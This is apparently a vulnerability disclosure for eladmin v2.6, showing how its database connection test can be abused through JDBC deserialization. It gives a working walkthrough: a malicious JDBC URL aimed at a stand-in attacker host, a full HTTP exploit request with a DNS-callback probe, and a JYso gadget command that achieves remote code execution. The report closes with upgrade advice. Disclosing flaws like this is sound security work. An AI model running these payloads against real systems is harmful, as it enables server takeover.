The version of the MySQL connector used by eladmin v2.6 is outdated, which makes it vulnerable to JDBC deserialization attacks.

[2308652512]

I noticed that you upgraded the version of mysql-connector-java in your update two weeks ago, so this issue should not occur in the new version of eladmin. However, since the version of org.springframework.boot used in version 2.6 is 2.1.0.RELEASE, which has a default mysql-connector-java version of 8.0.13, it is still susceptible to JDBC deserialization security issues.

To deploy version 2.6 of eladmin, you can obtain the source code from the link below:
https://github.com/elunez/eladmin/blob/babebdee92cb3d1e799b081c3693b4ed079e73c3

As shown in the figure below, the version of org.springframework.boot used in version 2.6 of eladmin is 2.1.0.RELEASE, which has a default mysql-connector-java version of 8.0.13.

What security vulnerabilities could this lead to? Please take note of the following file:

\eladmin-system\src\main\java\me\zhengjie\modules\mnt\rest\DatabaseController.java

Please note that there is a functionality for connecting to the database here.

Analyze the implementation of the testConnection() function.

The testConnection() function of the SqlUtils class is called here, and all the parameters passed to this function are under our control.

Finally, the getConnection() function will be called, which is a classic JDBC deserialization point.

Next, I will deploy eladmin locally. I am using Java 8 and a Windows system for testing.

The backend source code can be downloaded from the following link:

https://github.com/elunez/eladmin/blob/babebdee92cb3d1e799b081c3693b4ed079e73c3

The frontend source code can be downloaded from here:

https://github.com/elunez/eladmin-web

Please ensure that both are properly deployed.

Log in to the system using the default username and password: admin and 123456.

Access "运维管理-数据库管理",Click on "新增" button.

Next, we need to deploy a malicious MySQL service, which can be downloaded from the following link:

https://github.com/4ra1n/mysql-fake-server

Use the command java -jar fake-mysql-cli-0.0.4.jar to start this service.

Assume this service is running on:
attacker-vps:3308

We construct the malicious JDBC connection string as follows:
jdbc:mysql://attacker-vps:3308/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor

Then,click "测试"

You can see the request below; this is our malicious request:

`
POST /api/database/testConnect HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Authorization: Bearer your-jwt-token
Content-Length: 229
Origin: http://o69iay0p.hebyicai.com:8087
Connection: close
Referer: http://o69iay0p.hebyicai.com:8087/
Priority: u=0

{"id":null,"name":"1","jdbcUrl":"jdbc:mysql://attacker-vps:3308/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor","userName":"deser_URLDNS_http://xxx.dnslog.cn","pwd":"1"}
`

As we can see, the URLDNS gadget has been successfully triggered, indicating that there is a deserialization vulnerability present here.

Next, we aim to achieve Remote Code Execution (RCE) through this deserialization vulnerability, noting that eladmin utilizes the Fastjson dependency.

Therefore, we can use the JYso tool to generate Fastjson gadgets:

https://github.com/qi4L/JYso

java -jar JYso-1.3.3.jar -y -g Fastjson1 -p 'calc.exe' -b64

Copy the payload generated by JYso above, and place it in a file named payload.txt in the root directory of the malicious MySQL server fake-mysql-cli-0.0.4.jar. Paste the payload generated by JYso into the payload.txt file.

Use the following command to restart fake-mysql-cli-0.0.4.jar:

java -jar fake-mysql-cli-0.0.4.jar -f payload.txt

Then modify our malicious request:

Next, we can observe that calc.exe has popped up, which confirms that the Fastjson gadget has executed successfully, directly resulting in remote code execution.

Users should avoid using version 2.6 of eladmin and upgrade to version 2.7 or the latest version as soon as possible.

[CFH-Steven]

这是来自QQ邮箱的假期自动回复邮件。   你好，你发的信息我已经收到，谢谢。